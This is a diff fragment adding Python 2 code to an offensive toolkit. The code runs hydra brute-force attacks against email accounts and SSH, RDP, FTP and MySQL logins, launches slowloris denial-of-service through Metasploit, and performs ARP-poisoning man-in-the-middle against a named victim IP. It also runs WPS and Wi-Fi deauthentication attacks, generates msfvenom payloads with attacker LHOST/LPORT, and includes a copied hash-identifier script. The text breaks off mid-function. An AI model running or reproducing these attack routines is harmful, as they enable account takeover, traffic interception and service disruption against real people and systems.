_ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') + os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) + os.system('echo "run\n" >> handler.rc') + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if 